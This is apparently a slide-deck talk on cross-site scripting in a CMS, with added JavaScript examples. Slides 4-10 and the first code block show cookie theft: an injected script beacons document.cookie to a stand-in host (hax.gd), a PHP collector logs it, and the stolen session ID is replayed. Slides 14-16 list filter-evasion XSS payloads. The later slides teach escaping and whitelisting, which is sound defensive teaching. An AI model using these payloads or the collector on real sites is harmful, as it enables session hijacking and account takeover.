Security & VanillaCMS An XSS Introduction and Attack Demonstration.


1 Security & VanillaCMS An XSS Introduction and Attack Demonstration

2 XSS: An Introduction "Cross-Site Scripting": using client-side code (e.g. JavaScript) that runs in the victim's browser, on the victim's site, to send sensitive information off to far-away places.

3 XSS: An Introduction Bobby Tables

4 XSS: An Introduction Mallory gets the page to load a script from http://hax.gd/x.js. Oh shit.

5 XSS: An Introduction That http://hax.gd/x.js script could be: alert('HA HA.');alert('Survive make your time.');

6 XSS: An Introduction That http://hax.gd/x.js script could be: document.write(document.cookie);

7 XSS: An Introduction That http://hax.gd/x.js script could be: document.write('<img src="http://hax.gd/x.php?' + document.cookie + '" style="display:none;" />'); which, in the victim's browser, writes out <img src="http://hax.gd/x.php?award_visited=1;__csuid=489058e83ee2e832;_PHPSESSID=t57tm1fvvdhonprigkdon71677" style="display:none;" /> so the browser quietly hands Mallory the victim's cookies, and a Referer header saying which page they were on.

8 XSS: An Introduction Let's have a look at http://hax.gd/x.php:

<?php
$fh = fopen('xss.log', 'a');
fwrite($fh, $_SERVER['HTTP_REFERER'] . var_export($_GET, 1));
fclose($fh);

One hit produces this xss.log entry (the Referer, then the query string as PHP parsed it):

http://example/cms/objects.php?_obj_name=example_data&_subnav=123
array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon71677' => '',)

9 XSS: An Introduction So what? Look again at that entry:

http://example/cms/objects.php?_obj_name=example_data&_subnav=123
array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon71677' => '',)

The _PHPSESSID value is the victim's live session ID, and the Referer line says exactly which CMS it belongs to.

10 XSS: An Introduction Steal the cookie. Get the URL of the CMS from the Referer. Put the stolen PHPSESSID into your own browser and you are logged in at will, no password needed, exposing the very soft underbelly that is the CMS. Time for a demo.
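The two halves of that chain, as an added example written for these notes (it is not code from the slides or from VanillaCMS): the beacon x.js builds in the victim's browser, and the parsing the attacker's collector does on the resulting hit. The collector URL http://hax.gd/x.php is the slide's; the victim cookie string and Referer are constructed from slide 8's log entry. Runs under Node with no extra packages.

```javascript
'use strict';
// Added example, not from the slides. Hypothetical collector URL (the
// slide's hax.gd/x.php) and constructed victim data modelled on xss.log.

// --- victim side: what x.js does in the victim's browser ---
// Build the hidden-image URL. The slide appends document.cookie raw;
// encoding it keeps '=' and ';' from being reinterpreted by the
// collector's query-string parser (the raw form still parses below).
function beaconUrl(cookieString, collector = 'http://hax.gd/x.php') {
  return collector + '?' + encodeURIComponent(cookieString);
}

// The tag x.js would document.write(); the browser fetches src as the
// victim and sends the current page as the Referer.
function beaconTag(cookieString) {
  return '<img src="' + beaconUrl(cookieString) + '" style="display:none;" />';
}

// --- attacker side: what x.php recovers from one hit ---
// document.cookie is "name=value; name=value"; split it back into pairs.
function parseCookieString(s) {
  const out = {};
  for (const part of s.split(';')) {
    const kv = part.trim();
    if (!kv) continue;
    const i = kv.indexOf('=');
    out[i < 0 ? kv : kv.slice(0, i)] = i < 0 ? '' : kv.slice(i + 1);
  }
  return out;
}

// requestUrl is the beacon the victim's browser fetched; referer is the
// Referer header it sent with it.
function parseBeacon(requestUrl, referer) {
  const u = new URL(requestUrl);
  const cookies = parseCookieString(decodeURIComponent(u.search.slice(1)));
  const page = new URL(referer);
  return {
    cmsOrigin: page.origin,               // where to log in
    cmsPath: page.pathname,               // which script the victim was on
    sessionId: cookies.PHPSESSID ?? null, // the prize
    cookies,
  };
}

// Constructed from the slide's log entry: the slide's values, with the
// "; " separators document.cookie actually uses.
const VICTIM_COOKIE =
  'award_visited=1; __csuid=489058e83ee2e832; PHPSESSID=t57tm1fvvdhonprigkdon71677';
const VICTIM_REFERER =
  'http://example/cms/objects.php?_obj_name=example_data&_subnav=123';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(beaconTag(VICTIM_COOKIE));
  console.log(parseBeacon(beaconUrl(VICTIM_COOKIE), VICTIM_REFERER));
}
```

Everything the attacker needs to log in (origin, path, session ID) comes from two request headers the browser adds on its own; nothing in the injected script has to know where it is running.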

11

12 Filtering and Escaping The two are sometimes conflated, with side-effects such as backslashes or HTML entities turning up in stored data. That is all very well and good while the data only ever comes back out as HTML, but what happens when you want to put it into an email message or save it out to a text document? "Strip out all tags!" has the opposite problem and mangles legitimate content: text such as "1 < bar then …" comes back with the "<" and whatever the stripper took for the rest of the "tag" gone.

13 Filtering and Escaping
Validation & Filtering: checking for and getting rid of the nasties, on the way in.
- Checking data is of the correct type, e.g. email addresses, postcodes, message text.
- Stripping out control characters, fixing multibyte encoding shenanigans with iconv().
Escaping: packaging data up for its transport, on the way out, once, for the one transport it is about to go into.
- mysql_real_escape_string() for MySQL strings (removed in PHP 7; bound parameters in a prepared statement need no escaping at all and are the better answer in any case).
- htmlentities($x, ENT_QUOTES, 'UTF-8') for HTML.
- urlencode() for query params.

14 Filtering and Escaping Why don't we just kill any tags we find? Because the tag can be written so that a stripper never recognises it:
"><SCRIPT>alert('a')</SCRIPT>  (breaking out of a quoted attribute first)
<IMG SRC=javascr	ipt:aler	t('XSS')>  (a tab or newline inside "javascript", which browsers ignore)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  (hex entities spelling javascript:alert('XSS'); the browser decodes them in the attribute)
<SCR<SCRIPT>IPT>alert('a');</SCR</SCRIPT>IPT>  (strip the <SCRIPT> tags once and the leftover pieces reassemble into <SCRIPT>alert('a');</SCRIPT>)
<img src="javascript:alert('a')"  (never closed; the browser closes it for you)
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' ) " >  (whitespace between every character)

15 Filtering and Escaping Why don't we just kill any tags we find?
<iframe src=http://foo/x.html <  (unclosed iframe)
<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>  (an XBL binding attached through CSS, in Firefox of the day)
¼script¾alert(¢XSS¢)¼/script¾  (US-ASCII encoding evasion: with the page served as US-ASCII the high bit is dropped, and ¼ ¾ ¢ become < > ")
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">  (the base64 decodes to <script>alert('XSS')</script>)

16 Filtering and Escaping Why don't we just kill any tags we find?
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">  (CSS unicode escapes spelling url('javascript:alert('XSS')'))
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>  (@import with backslashes breaking up the keywords)
exp/* … */ression(alert('a'))  (IE's CSS expression(), with a comment splitting the keyword, inside a style="" attribute)
<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE>  (the payload lives in a stylesheet, not in any element the filter is looking at)
]]>  (closing a CDATA section, so that whatever follows is parsed as markup again)

17 Filtering and Escaping Yeah, no. The transport is HTML; package it appropriately. htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff wherever the data lands in element text or inside a quoted attribute: <, >, ", ' and & come out as entities, so the browser never sees a tag, and the hex-entity payloads above come out as literal text because their & is escaped too. Use it even on the things you "trust" like $_SERVER['PHP_SELF'] or REQUEST_URI. It gets hard when you need to put user data into src="" or style="" fields: the quotes stay balanced, but javascript:alert('a') is a perfectly well-formed attribute value that needs no tag at all. Suggest using a whitelist instead (allowed schemes and hosts for URLs, allowed properties and values for styles), no matter how much of a pain it is to implement. (Or, in the case of images and other files, generate the filename yourself and never use the user's.) Marking the session cookie HttpOnly keeps it out of document.cookie and so defeats this particular demo, but an injected script can still drive the CMS with the victim's session from inside the page, so it narrows the damage rather than fixing the bug.
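To make the point from slides 14 to 17 concrete, here is an added example (written for these notes, not code from the slides or from VanillaCMS) that puts a "kill the script tags" filter next to an htmlentities-style escape and a whitelist for src="", and runs them over payloads of the kinds listed above. The payloads, the example site http://example/ and its allowed host list are constructed for the demonstration. Node, no external packages.

```javascript
'use strict';
// Added example, not from the slides: blacklist filtering versus
// escaping-for-the-transport, plus a whitelist for the src="" case.

// What "strip out all tags" usually ends up as in practice: remove
// <script> tags. This is the filter the slides argue against.
function stripScriptTags(s) {
  return s.replace(/<\/?script[^>]*>/gi, '');
}

// The PHP htmlentities($x, ENT_QUOTES, 'UTF-8') equivalent for the five
// characters that matter in element text and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// For src="": escaping is not enough, because javascript:... is a
// well-formed attribute value. Resolve the value the way a browser would
// (the WHATWG URL parser drops tabs and newlines, as browsers do), then
// allow only http(s) on hosts you chose. Returns null for anything else.
function safeSrc(value, base, allowedHosts) {
  let u;
  try { u = new URL(value, base); } catch { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (!allowedHosts.includes(u.host)) return null;
  return u.href;
}

// Output helpers: escape for the HTML transport at the point of output.
function renderComment(userText) {
  return '<p>' + escapeHtml(userText) + '</p>';
}

// Hypothetical site and host list for the demonstration.
const SITE = 'http://example/';
const IMAGE_HOSTS = ['example'];

function renderImage(userSrc) {
  const src = safeSrc(userSrc, SITE, IMAGE_HOSTS);
  return src ? '<img src="' + escapeHtml(src) + '" />' : '<img src="/img/blank.png" />';
}

// Constructed payloads, after the slides' "why don't we just kill any tags" lists.
const PAYLOADS = {
  nested: "<SCR<SCRIPT>IPT>alert('a');</SCR</SCRIPT>IPT>",
  img: "<IMG SRC=javascript:alert('XSS')>",
  tab: "java\tscript:alert('a')",
  hexEntities: '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A' +
               '&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('filter :', stripScriptTags(PAYLOADS.nested)); // the tag is back
  console.log('escape :', renderComment(PAYLOADS.nested));   // inert text
  console.log('src    :', renderImage(PAYLOADS.tab), renderImage('/uploads/a.png'));
}
```

The nested payload comes out of the filter as a working <SCRIPT> tag, and the IMG payload is not touched by it at all, while the escaped versions contain no raw <, >, " or ' for the browser to act on. The whitelist is what handles the src="" case: the tab-split javascript: value resolves to the javascript: scheme and is refused, a relative path resolves onto the site's own host and is kept, and the hex-entity string resolves to a harmless path on the site rather than to a script.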

